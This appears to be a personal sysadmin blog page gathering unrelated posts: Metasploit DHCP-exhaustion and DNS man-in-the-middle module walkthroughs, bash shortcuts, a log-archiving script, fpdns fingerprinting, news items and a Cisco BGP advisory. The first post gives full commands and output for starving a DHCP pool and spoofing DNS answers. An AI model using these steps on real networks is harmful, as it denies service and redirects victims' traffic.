RootAdmin.co.uk

DigiNinja has created a meta sploit module for a DHCP Exhaustion attack tool which continues to request DHCP addresses till it stops getting responses from the server which, as far as I can tell, means the IP pool is exhausted ( meaning  that no there are no available address’s from DHCP and a computer set to get a DHCP address cant get on the network – a very nice idea for a Denial of Service Attack in my oppinion.

He has also created a DNS Man in The Middle module which has been worked on by various people, the last being Wesley McGrew who released his version but never got round to getting it into the Metasploit Framework. The module loads a list of domains to give fake responses for and returns real results for everything else. His work on this was to add the facility to have it reload the config file without a restart by doing a look up on a pre-set domain. He also fixed a couple of minor bugs.

See http://www.digininja.org/metasploit/dns_dhcp_beta.php

Usage

You’ll need to be root to run both modules and for the DHCP module you’ll need to put the interface into promiscious mode before starting the attack so it can hear all the replies to the fake requests. The easiest way to explain how to use them is to just show the modules in use so here they are…

DHCP Exhaustion

msf > use auxiliary/digininja/dhcp_exhaustion/exhaust
msf auxiliary(exhaust) > set

Global
======

No entries in data store.

Module: dhcp_exhaustion/exhaust
===============================

  Name        Value
  ----        -----
  DHCPSERVER  255.255.255.255
  SNAPLEN     65535
  TIMEOUT     2

msf auxiliary(exhaust) > run

[*] DHCP attack started
[*] DHCP offer of address: 192.168.0.53
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.54
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.55
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.56
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.57
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.58
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.59
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.60
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.52
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.51
[*] Got the ACK back, IP address allocated successfully
[*] Timeout waiting for OFFER
[*] Got a timeout, assuming DHCP exhausted. You Win
[*] Finished
[*] Auxiliary module execution completed

DNS MiTM

msf > use auxiliary/digininja/dns_mitm/dns_mitm
msf auxiliary(dns_mitm) > set

Global
======

No entries in data store.

Module: dns_mitm/dns_mitm
=========================

  Name     Value
  ----     -----
  RELOAD   digininja.reload
  SRVHOST  0.0.0.0
  SRVPORT  53

msf auxiliary(dns_mitm) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: FILENAME, REALDNS.
msf auxiliary(dns_mitm) > set FILENAME /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
FILENAME => /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
msf auxiliary(dns_mitm) > set REALDNS 192.168.0.8
REALDNS => 192.168.0.8
msf auxiliary(dns_mitm) > set

Global
======

No entries in data store.

Module: dns_mitm/dns_mitm
=========================

  Name      Value
  ----      -----
  FILENAME  /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
  REALDNS   192.168.0.8
  RELOAD    digininja.reload
  SRVHOST   0.0.0.0
  SRVPORT   53

msf auxiliary(dns_mitm) > run
[*] Auxiliary module running as background job
msf auxiliary(dns_mitm) >
[*] Loading hosts file

The hosts file contains a single entry

192.168.0.2 google.com

Now do some look ups, google.com and bbc.co.uk

nslookup
> server localhost
Default server: localhost
Address: ::1#53
Default server: localhost
Address: 127.0.0.1#53
> google.com
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   google.com
Address: 192.168.0.2
Name:   google.com
Address: 192.168.0.2
Name:   google.com
Address: 192.168.0.2
> bbc.co.uk
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   bbc.co.uk
Address: 212.58.224.138

Google is middled but the BBC gets through, now add the BBC to the hosts file

echo "192.168.0.2 bbc.co.uk" >> dns.txt

Refresh the server by looking up the special domain and then check the BBC again

> digininja.reload
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
*** Can't find digininja.reload: No answer
> bbc.co.uk
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   bbc.co.uk
Address: 192.168.0.2

The BBC is now ours!

Here is a list of some bash keyboard shortcuts you may or may not find useful

Alt + B     Move cursor backward one word on the current line
Alt + F     Move cursor forward one word on the current line
Ctrl + A     Go to the beginning of the line you are currently typing on
Ctrl + C     Kill whatever you are running
Ctrl + D     Exit the current shell
Ctrl + E     Go to the end of the line you are currently typing on
Ctrl + H     Same as backspace
Ctrl + K     Clear the line after the cursor
Ctrl + L     Clears the Screen, similar to the clear command
Ctrl + U     Clears the line before the cursor position. If you are at the end of the line, clears the entire line.
Ctrl + R     Let’s you search through previously used commands
Ctrl + T     Swap the last two characters before the cursor
Ctrl + W     Delete the word before the cursor
Ctrl + Z     Puts whatever you are running into a suspended background process. fg restores it.
Esc + T     Swap the last two words before the cursor
Tab         Auto-complete files and folder names

Well below is my first attempt at a shell script, firstly understand I am no programmer!

Before we look at it, my server is running OPENVPN and Uncomplicated Firewall(I’m running Ubuntu Server)

So how does it work?

Firstly we declare that we are using the bash shell using
#!/bin/bash

Next we’re setup some vairables, the first is simply formating the date and calling itself TODAYSDATE,
next we set todays archive to be archive.TODAYSDATE and call its self TODAYS_ARCHIVE

Next we create a directory called archive.TODAYSDATE

Now to the best bit, we start processing the logs
- We extract todays logs out of syslog
- From the extracted logs we extract the firewall (Uncomplicated Firewal/ UFW) logs to a seperate file
- Now extract todays messages log
- From todays extracted logs extract all OPENVPN related logs to a seperate log file
- Extract todays apache access.log and error.log
- Provide us with the currently running processes
- Zip it all up to the /archive/ folder
- back back up a directory level and delete the folder called archive.TODAYSDATE
- Now use mutt to attach the zip file to a email and send it

Now for the script – PLEASE FEEL FREE TO USE

#!/bin/bash
# Script By Liam Somerville, www.rootadmin.co.uk
# Use freely

#####################################################################
#                        Set up the variables
#####################################################################
#Set todays date
TODAYSDATE=`date +”%d-%b-%Y”`

#Format Archive
TODAYS_ARCHIVE=archive.$TODAYSDATE

#####################################################################
#                    Finished setting up Variables
#
#                   Now start processing the log files
#####################################################################

# Make a directory called archive with todays date and change to that direcory
mkdir $TODAYS_ARCHIVE
cd $TODAYS_ARCHIVE

#Write the log files
#Archive todays Syslog, extract all firewall related logs to firewall, then
# extract messages
cat /var/log/syslog | grep “`date +”%b %e” `” > syslog.$TODAYSDATE
cat syslog.$TODAYSDATE | grep UFW > firewall_log.$TODAYSDATE
cat /var/log/messages | grep “`date +”%b %e” `” > messages.$TODAYSDATE
#Process the OPEN VPN Server logs
cat syslog.$TODAYSDATE | grep “ovpn-server” > vpn_server_log.$TODAYSDATE
#
#Proceess Apache Logs
cat /var/log/apache2/error.log | grep “`date +”%b %d” `” > apache_error_log.$TODAYSDATE
cat /var/log/apache2/access.log | grep “`date +”%d/%b” `” > apache_access_log.$TODAYSDATE
#
#Process FTP Logs
cat /var/log/vsftpd.log | grep “`date +”%b %e” `” > ftp_log.$TODAYSDATE
#
# Get a list of currently running process
ps aux > Processes.$TODAYSDATE

# Zip up all the logs and delete todays log
zip /archive/$TODAYS_ARCHIVE.zip *
cd ..
rm -r $TODAYS_ARCHIVE

####################################################################
#                     Now email the zip file
###################################################################
echo | mutt -a /archive/$TODAYS_ARCHIVE.zip -s “Event logs for $TODAYSDATE” you@your.email.address.com

Following the decision of the European Parliament that enables European member states to approve laws that force ISPs to disconnect individuals from the Internet, the UK is planning on enforcing its own version of the “three-strikes” law meant to discourage illegal file sharing.

According to The Guardian, Lord Peter Mandelson, the Business Secretary, announced that this law is supposed become reality in 2011. It will go through a 12 months long testing phase that will see warning letters sent to persistent offenders. If the scope of the illegal activity doesn’t drop by at least 70 percent by April 2011, three months later the practice of cutting off the Internet access will be set in motion.

There were a lot of voices raised against this plan. ISPs don’t want the responsibility – it’s bad for their public image, and also raises operational costs. The Open Rights Group sees it as an infringement of basic rights. Times Online reports that even UK’s law enforcement and intelligence services are against it. They fear that pirates will begin to use encryption and thus make their job even harder (not to mention the increase of workload and costs).

On the opposite side sit the music and movie industries. They are, of course, anxious to see the law in practice since they “lose” hundreds of millions of pounds every year.

SIGN THE PETITION http://petitions.number10.gov.uk/dontdisconnectus/ – UK Citizens only

Install fpdns in Ubuntu

sudo aptitude install fpdns

This will complete the installation

Using fpdns

fpdns [-c] [-d] [-f] [-p port] [-Q srcaddr] [-r retry] [-s] [-t timeout] [-v] server

Where: server is an ip address or a resolvable name
or ‘-’ to read list of servers from stdin
-c (where appropriate check CH TXT version) [off]
-d (debug) [off]
-f (force check CH TXT version) [off]
-F (maximum forked processes) [10]
-p port (nameserver is on this port) [53]
-Q srcaddr (source IP address) [0.0.0.0]
-r retry (set number of attempts) [1]
-s (short form) [off]
-t time (set query timeout) [5]
-v (show version)

fpdns Examples

BIND Version 8 Example

fpdns -D google.com

fingerprint (google.com, 216.239.34.10): ISC BIND 8.3.0-RC1 — 8.4.4
fingerprint (google.com, 216.239.36.10): ISC BIND 8.3.0-RC1 — 8.4.4
fingerprint (google.com, 216.239.38.10): ISC BIND 8.3.0-RC1 — 8.4.4
fingerprint (google.com, 216.239.32.10): ISC BIND 8.3.0-RC1 — 8.4.4

BIND Version 9 Example

fpdns -D debianhelp.co.uk

fingerprint (debianhelp.co.uk, 212.67.202.2): ISC BIND 9.2.3rc1 — 9.4.0a0 [recursion enabled]
fingerprint (debianhelp.co.uk, 212.67.203.246): ISC BIND 9.2.3rc1 — 9.4.0a0 [recursion enabled]

TinyDNS Example

fpdns ns1.eu.dedicatedserver.com.

fingerprint (ns1.eu.dedicatedserver.com., 213.198.65.226): DJ Bernstein TinyDNS 1.05

Microsoft windows 2003 Example
fpdns -D microsoft.com

fingerprint (microsoft.com, 207.68.160.190): Microsoft Windows DNS 2003
fingerprint (microsoft.com, 65.54.240.126): Microsoft Windows DNS 2003

Well, the update for the PS3 version 3.0 looks very disapointing.

It’s due to be released on Setpember 1st.

i everyone, PlayStation 3 (PS3) firmware update (v3.00) adds a number of great new features that we’re excited to share with you. The latest update incorporates changes that improve navigation on your PS3. First, you’ll notice some cosmetic changes to the design of the XMB (Xross Media Bar). We’ve enhanced the look and feel of the XMB so that it’s easier and even more intuitive to use. We’ve also added network improvements and personalization options to help enhance your PS3 experience.

Additional highlights from update 3.00 include:

• “What’s New” – The “Information Board” will be replaced with a “What’s New” section, which allows you to enjoy interactive PlayStation news every time you start the PS3 system. Located under the PlayStation Network icon, “What’s New” displays the latest and greatest game, video, PlayStation Network and PlayStation news and releases, as well as your recently played games, in a sleek, new animated format.
• Status Indicator – In the top right corner we’ve added an indicator bar, which displays your user icon, friend icon, the number of friends you have online and a small message icon to let you know if you have any new messages. The indicator also includes a scrolling ticker that features the latest news from PlayStation Network. In addition, when you press the PS button, the battery life indicator will no longer cover up the clock.
• Friends List – Now your PlayStation Network friends will appear in a slightly redesigned format on your Friends List. Also, messages will now be viewable from each of your friends’ respective profiles.
• PlayStation Store Shortcuts – We’ve added a handy shortcut icon to the PlayStation Store under both the Game and Video categories so you can access the latest content quickly and easily.
• Personalization – Personalize your PS3 with new dynamic custom themes and avatars. Dynamic themes as well as free and premium avatars will be available through PlayStation Store. A dynamic theme takes your screen to a whole new level as it incorporates animated objects into the background.
• Trophies – Showcasing your hard earned trophies just got better. Update 3.00 gives game developers the ability to modify how they display trophies for add-on content. Base and add-on game trophies will continue to be combined into a single list so you can see where you stand in a game as a whole. Within that list, trophies will be broken out into subcategories—base trophies and add-on trophies—that way, you can easily view the percentage of your base game trophy collection, and separately track your trophy progress in add-on packs. Look for this enhancement to be included in upcoming games.

GIVE IT UP, microsoft have said they will support IE 6 until 2014. IE 6 was initially realease on August 27, 2001, come the prposed end of life date – 2014, IE 6 will be 13 years old! In computing terms, that will make IE 6 a dinosaur.

As of January 10, 2009, Secunia reports 142 vulnerabilities in Internet Explorer 6, 22 of which are unpatched, some of which are rated moderately critical in severity.

“Microsoft has underlined support for its Internet Explorer 6 web browser, despite acknowledging its flaws.

The software giant said it would support IE6 until 2014 – four years beyond the original deadline.

Critics – some of which have started an online campaign – want the eight-year-old browser mothballed because they claim it slows the online experience.

“Friends do not let friends use IE6,” said Amy Barzdukas, Microsoft’s general manager for Internet Explorer.

“If you are in my social set and I have been to your house for dinner, you are not using IE6,” she said. “But it is much more complicated when you move into a business setting.”

“It’s hard to be cavalier in this economy and say ‘oh it’s been around for so long they need to upgrade,’” Ms Barzdukas told journalists in San Francisco..

Web monitoring firms estimate that 15-20% of people still use IE6 to browse the web.

Enough is enough

Among those speaking out against IE6 is a group of more than 70 developers who have banded together to form a project called ie6nomore.” – http://news.bbc.co.uk/1/hi/technology/8196242.stm

Why not take a look at IE6NoMore

For some time now I have believed that there has been too much importance placed on the acadmic world. Today it would appear I was proven right.

Recent versions of Cisco IOS Software support RFC4893 (“BGP Support for Four-octet AS Number Space”) and contain two remote denial of service (DoS) vulnerabilities when handling specific Border Gateway Protocol (BGP) updates.

These vulnerabilities affect only devices running Cisco IOS Software with support for four-octet AS number space (here after referred to as 4-byte AS number) and BGP routing configured.

The first vulnerability could cause an affected device to reload when processing a BGP update that contains autonomous system (AS) path segments made up of more than one thousand autonomous systems.

The second vulnerability could cause an affected device to reload when the affected device processes a malformed BGP update that has been crafted to trigger the issue.

Cisco has released free software updates to address these vulnerabilities.

No workarounds are available for the first vulnerability.

A workaround is available for the second vulnerability.

This advisory is posted at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20090729-bgp.shtml.

Affected Products

These vulnerabilities affect only devices running Cisco IOS and Cisco IOS XE Software (here after both referred to as simply Cisco IOS) with support for RFC4893 and that have been configured for BGP routing.

The software table in the section “Software Versions and Fixes” of this advisory indicates all affected Cisco IOS Software versions that have support for RFC4893 and are affected by this vulnerability.

A Cisco IOS software version that has support for RFC4893 will allow configuration of AS numbers using 4 Bytes. The following example identifies a Cisco device that has 4 byte AS number support:

Router#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
Router(config)#router bgp ?
  <1-65535>    Autonomous system number
  <1.0-XX.YY>  4 Octets Autonomous system number

Or:

Router#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
Router(config)#router bgp ?
  <1-4294967295>  Autonomous system number
  <1.0-XX.YY>     Autonomous system number

The following example identifies a Cisco device that has 2 byte AS number support:

Router#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
Router(config)#router bgp ?
  <1-65535>  Autonomous system number

A router that is running the BGP process will contain a line in the configuration that defines the autonomous system number (AS number), which can be seen by issuing the command line interface (CLI) command “show running-config”.

The canonical textual representation of four byte AS Numbers is standardized by the IETF through RFC5396 (Textual Representation of Autonomous System (AS) Numbers). Two major ways for textual representation have been defined as ASDOT and ASPLAIN. Cisco IOS routers support both textual representations of AS numbers. For further information about textual representation of four byte AS numbers in Cisco IOS Software consult the document “Explaining 4-Byte Autonomous System (AS) ASPLAIN and ASDOT Notation for Cisco IOS” at the following link: http://www.cisco.com/en/US/prod/collateral/iosswrel/ps6537/ps6554/ps6599/white_paper_c11_516829.html

Cisco IOS Software with support for RFC4893 is affected by both vulnerabilities if BGP routing is configured using either ASPLAIN or ASDOT notation.

The following example identifies a Cisco device that is configured for BGP using ASPLAIN notation:

router bgp 65536

The following example identifies a Cisco device that is configured for BGP using ASDOT notation:

router bgp 1.0

To determine the Cisco IOS Software release that is running on a Cisco product, administrators can log in to the device and issue the show version command to display the system banner. The system banner confirms that the device is running Cisco IOS Software by displaying text similar to “Cisco Internetwork Operating System Software” or “Cisco IOS Software.” The image name displays in parentheses, followed by “Version” and the Cisco IOS Software release name. Other Cisco devices do not have the show version command or may provide different output.

The following example identifies a Cisco product that is running Cisco IOS Software Release 12.3(26) with an installed image name of C2500-IS-L:

Router#show version
Cisco Internetwork Operating System Software
IOS (tm) 2500 Software (C2500-IS-L), Version 12.3(26), RELEASE SOFTWARE (fc2)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by cisco Systems, Inc.
Compiled Mon 17-Mar-08 14:39 by dchih

The following example identifies a Cisco product that is running Cisco IOS Software Release 12.4(20)T with an installed image name of C1841-ADVENTERPRISEK9-M:

Router#show version
Cisco IOS Software, 1841 Software (C1841-ADVENTERPRISEK9-M), Version 12.4(20)T, RELEASE SOFTWARE (fc3)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by Cisco Systems, Inc.
Compiled Thu 10-Jul-08 20:25 by prod_rel_team

The following Cisco products are confirmed not vulnerable:

• Cisco IOS Software not explicitly mentioned in this Advisory
• Cisco IOS XR Software
• Cisco IOS NX-OS

No other Cisco products are currently known to be affected by this vulnerability.

ObtainingFixed Software

Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco’s software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades.

So your phones got wifi and blue tooth,  need to know the blutooth device address or your wlan mac address?

*#2820# (*#BTA0#) – This will display the Bluetooth device address for your Nokia

*#62209526# (*#MAC0WLAN) – This will show you the MAC address of the WLAN adapter on your nokia